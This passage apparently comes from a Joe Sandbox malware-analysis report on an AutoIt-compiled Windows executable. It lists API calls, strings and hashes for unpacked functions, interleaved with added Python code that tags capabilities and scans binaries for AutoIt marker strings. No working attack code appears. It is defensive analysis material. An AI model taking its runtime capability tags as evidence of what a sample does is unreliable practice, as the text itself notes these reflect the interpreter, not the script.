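• String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$CMDLINE$CMDLINERAW
APIs
Similarity
• API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
"""


def parse_entries(text):
    """Split report text into function entries. Each entry is a dict with
    'apis' (set of API names, subcalls included), 'refs' (list of
    (api, module, call-site) tuples), 'api_id' and 'string_id'."""
    entries = []
    cur = None
    for line in text.splitlines():
        if line.strip() == ENTRY_START:
            cur = {"apis": set(), "refs": [], "api_id": "", "string_id": ""}
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            cur["apis"].add(m.group("api"))
            cur["refs"].append((m.group("api"), m.group("mod"), m.group("ref")))
            continue
        m = SIM_LINE.match(line)
        if m:
            key = "api_id" if m.group("key") == "API ID" else "string_id"
            cur[key] = m.group("val").strip()
    return entries


def classify(entry):
    """Return the capability labels for one entry. Explicit call lines are
    authoritative; only when the report printed none do we fall back to
    substring matching on the concatenated 'API ID' token string, which
    Joe Sandbox builds from the same API names."""
    labels = []
    for label, names in CAPABILITIES:
        hit = bool(entry["apis"] & names)
        if not hit and not entry["apis"]:
            hit = any(n in entry["api_id"] for n in names)
        if hit:
            labels.append(label)
    return labels


def triage(text):
    """Return [(entry_index, labels, string_id)] for every entry that got
    at least one capability label."""
    out = []
    for i, entry in enumerate(parse_entries(text)):
        labels = classify(entry)
        if labels:
            out.append((i, labels, entry["string_id"]))
    return out


if __name__ == "__main__":
    for idx, labels, strings in triage(SAMPLE):
        print(f"function #{idx}: {', '.join(labels)}  strings={strings}")
```

Read the output with the usual AutoIt caveat: the String IDs on these entries (`/AutoIt3ExecuteScript`, `AutoIt v3`, `Software\AutoIt v3\AutoIt`) mark them as the AutoIt3 interpreter's own runtime, so a `registry-write` or `local-ip-discovery` tag says the runtime can do it, not that the embedded script does. For what the script itself does, pair this with the report's behaviour signatures and the decompiled AutoIt script rather than the runtime's API surface.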
                                                                                                                              APIs
                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 001730B0
                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 001730BF
                                                                                                                              • LoadIconW.USER32(00000063), ref: 001730D5
                                                                                                                              • LoadIconW.USER32(000000A4), ref: 001730E7
                                                                                                                              • LoadIconW.USER32(000000A2), ref: 001730F9
                                                                                                                                • Part of subcall function 0017318A: LoadImageW.USER32(00170000,00000063,00000001,00000010,00000010,00000000), ref: 001731AE
                                                                                                                              • RegisterClassExW.USER32(?), ref: 00173167
                                                                                                                                • Part of subcall function 00172F58: GetSysColorBrush.USER32(0000000F), ref: 00172F8B
                                                                                                                                • Part of subcall function 00172F58: RegisterClassExW.USER32(00000030), ref: 00172FB5
                                                                                                                                • Part of subcall function 00172F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00172FC6
                                                                                                                                • Part of subcall function 00172F58: LoadIconW.USER32(000000A9), ref: 00173009
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                               • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                              • String ID: #$0$AutoIt v3
                                                                                                                              • API String ID: 2880975755-4155596026
                                                                                                                              • Opcode ID: 8875d83b5305dc86cfd9c487e4f5d24c75bd0232f93967d6174a5848a437396e
                                                                                                                              • Instruction ID: 15b1589e0e9e9fecf7df901fd457ea71d1ad134cfe581ca537ade284a66de877
                                                                                                                              • Opcode Fuzzy Hash: 8875d83b5305dc86cfd9c487e4f5d24c75bd0232f93967d6174a5848a437396e
                                                                                                                              • Instruction Fuzzy Hash: 42213DB4E00304ABCB04DFA9FC4DA99BFF5FB48314F10822AE618A72A0D7758655DF91
                                                                                                                              APIs
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 001CB777
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 001CB7A4
                                                                                                                              • CoUninitialize.COMBASE ref: 001CB7AE
                                                                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 001CB8AE
                                                                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 001CB9DB
                                                                                                                              • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 001CBA0F
                                                                                                                              • CoGetObject.OLE32(?,00000000,001FD91C,?), ref: 001CBA32
                                                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 001CBA45
                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001CBAC5
                                                                                                                              • VariantClear.OLEAUT32(001FD91C), ref: 001CBAD5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                               • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2395222682-0
                                                                                                                              • Opcode ID: 1c802abe90423de96caf452b4f4d1a7609aba2293d1792e84bbf703302c7a436
                                                                                                                              • Instruction ID: 3d3002a275ac9253aa792ee72c00ecb839c414f1f1697068b1f0a76e907120b4
                                                                                                                              • Opcode Fuzzy Hash: 1c802abe90423de96caf452b4f4d1a7609aba2293d1792e84bbf703302c7a436
                                                                                                                              • Instruction Fuzzy Hash: 5AC110B1608305AFC704DF68C885E6AB7E9BF99308F04491DF98ADB251DB71ED05CB92
APIs
• GetSysColorBrush.USER32(0000000F), ref: 00172F8B
• RegisterClassExW.USER32(00000030), ref: 00172FB5
• RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00172FC6
• LoadIconW.USER32(000000A9), ref: 00173009
Similarity
• API ID: Register$BrushClassClipboardColorFormatIconLoad
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 975902462-1005189915
• Opcode ID: 3a20dddb9312a18984e5e2e519e3985ca70273e5e58133ce92233ff71bced2ef
• Instruction ID: e2c6ed8af00f437e90c74620b596af231e6f7301e6c3628a3f344599d09705c1
• Opcode Fuzzy Hash: 3a20dddb9312a18984e5e2e519e3985ca70273e5e58133ce92233ff71bced2ef
• Instruction Fuzzy Hash: B121C4B5900318AFEB00EFA4F889BEDBBF5FB08704F00421AF615A62A0D7B14594CF95
APIs
• _memset.LIBCMT ref: 001D23E6
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001D2579
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001D259D
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001D25DD
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001D25FF
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001D2760
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 001D2792
• CloseHandle.KERNEL32(?), ref: 001D27C1
• CloseHandle.KERNEL32(?), ref: 001D2838
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
• Opcode ID: 0a5c4dc97721e4717a560569cf0d4db2bbfd98a12fdf12f662f34a7c33af3b7e
• Instruction ID: 5d07feaa6fc43ef56a3aa39731d3b7b1515828cf8f1bfca5215f05dac1f08f64
• Opcode Fuzzy Hash: 0a5c4dc97721e4717a560569cf0d4db2bbfd98a12fdf12f662f34a7c33af3b7e
• Instruction Fuzzy Hash: 01D1AF31604301DFCB25EF24D891B6ABBE5AFA5314F14845EF8999B3A2DB30ED41CB52
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
• Opcode ID: ae919de2b4d036816dce06e1f481b0ec058fedc30b6da62e702be3e3bb24f3b8
• Instruction ID: b217877638368a616642b6a1b3c7812080ec545f9121206e357eb82bceba2668
• Opcode Fuzzy Hash: ae919de2b4d036816dce06e1f481b0ec058fedc30b6da62e702be3e3bb24f3b8
• Instruction Fuzzy Hash: DCE19E71A00219ABDF14DFA8D885FEE77B9BF68354F14802DE949AB281E770DD41CB90
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2862541840-625585964
• Opcode ID: 687b8acc0fef72bf528eccd417b402a478c88502c43c4e8305ef749ad404aa02
• Instruction ID: 182ade9704349fbf4aec1098f21a8fbce51f112f2507df363395f22c85f94f52
• Opcode Fuzzy Hash: 687b8acc0fef72bf528eccd417b402a478c88502c43c4e8305ef749ad404aa02
• Instruction Fuzzy Hash: A5918A71A00219EBCB24DFA5D844FAEBBB8AF65710F14815DF919AB281D770DE41CFA0
APIs
• RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0018EADA,?,?), ref: 0018EB27
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,0018EADA,?,?), ref: 001E4B26
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,0018EADA,?,?), ref: 001E4B65
• RegCloseKey.ADVAPI32(?,?,0018EADA,?,?), ref: 001E4B94
Similarity
• API ID: QueryValue$CloseOpen
• String ID: Include$Software\AutoIt v3\AutoIt
• API String ID: 1586453840-614718249
• Opcode ID: 35550325db39feacb0e7321e0b5a53222dbbfe20d23270946b081e539c72b7f6
• Instruction ID: 4b5c98fc82e9e7eac8044f128f70a67f36248ae473e47babda6ca927e9667589
• Opcode Fuzzy Hash: 35550325db39feacb0e7321e0b5a53222dbbfe20d23270946b081e539c72b7f6
• Instruction Fuzzy Hash: 39114C71A01208BFEB04EBA4DD86EBE77BCEF14354F104069F506E6191EB70AE41DB50
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00172ECB
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00172EEC
• ShowWindow.USER32(00000000), ref: 00172F00
• ShowWindow.USER32(00000000), ref: 00172F09
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: fd391c253319bf16dafb0cca9c264fbfd7341fd601900ecf388e4db2f760ea0f
• Instruction ID: 133ac70758515b47f60557a01ca344f5381d09aeb1976b1d4971b394bf861f88
• Opcode Fuzzy Hash: fd391c253319bf16dafb0cca9c264fbfd7341fd601900ecf388e4db2f760ea0f
• Instruction Fuzzy Hash: 07F03470A502D07AE7305B67BC8CE773E7EE7C6F20B01411EBE08A21A0D26108A1DAB0
                                                                                                                              APIs
                                                                                                                              • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 001C9409
                                                                                                                              • WSAGetLastError.WS2_32(00000000), ref: 001C9416
                                                                                                                              • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 001C943A
                                                                                                                              • _strlen.LIBCMT ref: 001C9484
                                                                                                                              • _memmove.LIBCMT ref: 001C94CA
                                                                                                                              • WSAGetLastError.WS2_32(00000000), ref: 001C94F7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                               • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2795762555-0
                                                                                                                              • Opcode ID: 9e4b6b7b3fe3a435169544e3f1f5df98554ce297d5bf6afbea634d19e3b0635f
                                                                                                                              • Instruction ID: 65517fce24408abe9d944f7e2fcb57daa1ba4a47db8cf04a99bbe1e0ba885c6a
                                                                                                                              • Opcode Fuzzy Hash: 9e4b6b7b3fe3a435169544e3f1f5df98554ce297d5bf6afbea634d19e3b0635f
                                                                                                                              • Instruction Fuzzy Hash: 2D416375500104AFCB18EBA4DD99FAEB7B9EF68314F108259F51A97291DB30EE41CB60
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00173B1E: _wcsncpy.LIBCMT ref: 00173B32
                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 001B6DBA
                                                                                                                              • GetLastError.KERNEL32 ref: 001B6DC5
                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 001B6DD9
                                                                                                                              • _wcsrchr.LIBCMT ref: 001B6DFB
                                                                                                                                • Part of subcall function 001B6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 001B6E31
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                               • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3633006590-0
                                                                                                                              • Opcode ID: 252d25e7876a8cd0c6017d5d33abe462f2814e1ed2e05f33b1d76201a81023b7
                                                                                                                              • Instruction ID: 4becced5300100b2c3600092005198a875149a3dd635e890076c6b08e9372474
                                                                                                                              • Opcode Fuzzy Hash: 252d25e7876a8cd0c6017d5d33abe462f2814e1ed2e05f33b1d76201a81023b7
                                                                                                                              • Instruction Fuzzy Hash: 8E21DF656013189ADF24A7B4EC5AAFE33AD8F21310F200566E425C30E2EB28DE849B54
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001CACD3: inet_addr.WS2_32(00000000), ref: 001CACF5
                                                                                                                              • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 001C9160
                                                                                                                              • WSAGetLastError.WS2_32(00000000), ref: 001C916F
                                                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 001C918B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                               • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3701255441-0
                                                                                                                              • Opcode ID: 04fd99291ba207d5ca9bd3ee07026af0667f6bb6077bf671c003b7433215e866
                                                                                                                              • Instruction ID: e4eb7a43de7a8f3d490e0c7a28e16e86ff6e62fa2a4b5b44bcd298a02c0f3485
                                                                                                                              • Opcode Fuzzy Hash: 04fd99291ba207d5ca9bd3ee07026af0667f6bb6077bf671c003b7433215e866
                                                                                                                              • Instruction Fuzzy Hash: B6218E312002119FDB04BF68DC9AFBE77A9EF58728F08851DF916AB791DB70E8418B51
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                               • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: dE"
                                                                                                                              • API String ID: 0-3908124746
                                                                                                                              • Opcode ID: 9e2d4544f4813bf995eae23b1517e8f1705f2a47d06dad17d1a370d1c1c0981a
                                                                                                                              • Instruction ID: c70a91d41a0a3f52feac8ecc1979405985ae33083f7e4b6dc53ad0442b8aa973
                                                                                                                              • Opcode Fuzzy Hash: 9e2d4544f4813bf995eae23b1517e8f1705f2a47d06dad17d1a370d1c1c0981a
                                                                                                                              • Instruction Fuzzy Hash: BAF16A716083019FC714DF24C880B5ABBE6FF98314F10892EF9999B292D771E946CF82
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00173F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001734E2,?,00000001), ref: 00173FCD
                                                                                                                              • _free.LIBCMT ref: 001E3C27
                                                                                                                              • _free.LIBCMT ref: 001E3C6E
                                                                                                                                • Part of subcall function 0017BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,002322E8,?,00000000,?,00173E2E,?,00000000,?,0020DBF0,00000000,?), ref: 0017BE8B
                                                                                                                                • Part of subcall function 0017BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00173E2E,?,00000000,?,0020DBF0,00000000,?,00000002), ref: 0017BEA7
                                                                                                                                • Part of subcall function 0017BDF0: __wsplitpath.LIBCMT ref: 0017BF19
                                                                                                                                • Part of subcall function 0017BDF0: _wcscpy.LIBCMT ref: 0017BF31
                                                                                                                                • Part of subcall function 0017BDF0: _wcscat.LIBCMT ref: 0017BF46
                                                                                                                                • Part of subcall function 0017BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 0017BF56
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                               • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                              • API String ID: 1510338132-1757145024
                                                                                                                              • Opcode ID: 313e3a8f8f5c31e8fc2575abbe8ea1dc033836d46a42e1d65bb363ced7ad747c
                                                                                                                              • Instruction ID: bfe531a2596bee3d1ade35c57cbbf92a06489fa026932b413e3f4fb588547969
                                                                                                                              • Opcode Fuzzy Hash: 313e3a8f8f5c31e8fc2575abbe8ea1dc033836d46a42e1d65bb363ced7ad747c
                                                                                                                              • Instruction Fuzzy Hash: B2918F71910259AFCF08EFA5CC959EEB7B4BF19310F50402AF426EB291EB309A45CB50
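                                                                                                                               The record above shows the embedded AutoIt runtime's script-loading code referencing its script marker (">>>AUTOIT SCRIPT<<<") together with "Bad directive syntax error", and an earlier record shows the "AutoIt v3" window text. Pulling exactly these strings out of a binary is a quick triage check for "is this an AutoIt-compiled executable", which matters here because the interesting logic lives in the embedded script, not in the runtime stub the function listing describes. The following is an added example, not code from the Joe Sandbox report or from the AutoIt project; it assumes the encodings (the report prints decoded text, so both ASCII and UTF-16LE are searched), uses constructed byte blobs instead of real samples, and its marker list and classify function are this example's own, not any scanner's API. A hit means the file carries the AutoIt runtime; legitimate AutoIt tools carry the same strings, so it says nothing about intent on its own.

```python
import re
from pathlib import Path
from typing import Dict, List

# Strings copied from the function listing in this report (constructed
# list for this example; the report does not state their encoding, so
# both ASCII and UTF-16LE are searched below).
SCRIPT_MARKER = ">>>AUTOIT SCRIPT<<<"
RUNTIME_STRINGS = ("AutoIt v3", "Bad directive syntax error")


def _needles(text: str) -> Dict[str, bytes]:
    """Byte patterns for one marker in the two encodings a Windows binary is likely to use."""
    return {"ascii": text.encode("ascii"), "utf-16le": text.encode("utf-16-le")}


def find_markers(data: bytes) -> List[Dict[str, object]]:
    """Locate every AutoIt marker in a byte blob, reporting offset and encoding."""
    hits: List[Dict[str, object]] = []
    for text in (SCRIPT_MARKER, *RUNTIME_STRINGS):
        for enc, needle in _needles(text).items():
            for m in re.finditer(re.escape(needle), data):
                hits.append({"marker": text, "encoding": enc, "offset": m.start()})
    return sorted(hits, key=lambda h: int(h["offset"]))


def classify(data: bytes) -> Dict[str, object]:
    """Summarise the hits.

    'autoit_runtime' is set only on the script marker: that is the string the
    listing shows the runtime's script-loading code referencing, so it is a
    firmer signal than a stray 'AutoIt v3' window title. The other strings
    are reported as supporting evidence.
    """
    hits = find_markers(data)
    return {
        "autoit_runtime": any(h["marker"] == SCRIPT_MARKER for h in hits),
        "script_marker_count": sum(1 for h in hits if h["marker"] == SCRIPT_MARKER),
        "runtime_string_hits": sorted({str(h["marker"]) for h in hits if h["marker"] != SCRIPT_MARKER}),
        "hits": hits,
    }


def classify_file(path: str) -> Dict[str, object]:
    """Convenience wrapper for a file on disk (reads the whole file, which is fine for an executable)."""
    return classify(Path(path).read_bytes())


# Constructed sample blobs (not real PE files): the first carries the markers
# in UTF-16LE, as a Windows resource or wide-string literal would; the second
# has none of them.
SAMPLE_AUTOIT = (
    b"MZ" + b"\x00" * 64
    + "AutoIt v3".encode("utf-16-le") + b"\x00" * 16
    + SCRIPT_MARKER.encode("utf-16-le") + b"\x00" * 16
    + "Bad directive syntax error".encode("utf-16-le")
)
SAMPLE_OTHER = b"MZ" + b"\x00" * 64 + b"This program cannot be run in DOS mode"

if __name__ == "__main__":
    for name, blob in (("autoit-like", SAMPLE_AUTOIT), ("other", SAMPLE_OTHER)):
        result = classify(blob)
        print(name, result["autoit_runtime"], result["runtime_string_hits"])
        for hit in result["hits"]:
            print(f"  {hit['offset']:#010x} {hit['encoding']:8} {hit['marker']}")
```

                                                                                                                               On a real sample, call classify_file on the dropped executable rather than on the memory dump: the dump above is already unpacked, whereas the on-disk file is what a mail gateway or EDR would see, and the UTF-16LE hit offsets there point at the resource worth extracting next.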
                                                                                                                              APIs
                                                                                                                              • __getstream.LIBCMT ref: 0019418E
                                                                                                                                • Part of subcall function 0019889E: __getptd_noexit.LIBCMT ref: 0019889E
                                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 001941C9
                                                                                                                              • __wopenfile.LIBCMT ref: 001941D9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                               • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                              • String ID: <G
                                                                                                                              • API String ID: 1820251861-2138716496
                                                                                                                              • Opcode ID: abc0c3f0e7fede8081056f7bdc911e9a501321f907ee8b9ca2f2e961ba0c1762
                                                                                                                              • Instruction ID: 0946138588ce03e9ad4ee94bba680c368268cc7a9890083c1eb62fcdc8267ff7
                                                                                                                              • Opcode Fuzzy Hash: abc0c3f0e7fede8081056f7bdc911e9a501321f907ee8b9ca2f2e961ba0c1762
                                                                                                                              • Instruction Fuzzy Hash: 03110270910216ABDF20BFB49C42A6F3BA4BF75350B158539A414CB281EB74D99297A1
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0018C948,SwapMouseButtons,00000004,?), ref: 0018C979
                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0018C948,SwapMouseButtons,00000004,?,?,?,?,0018BF22), ref: 0018C99A
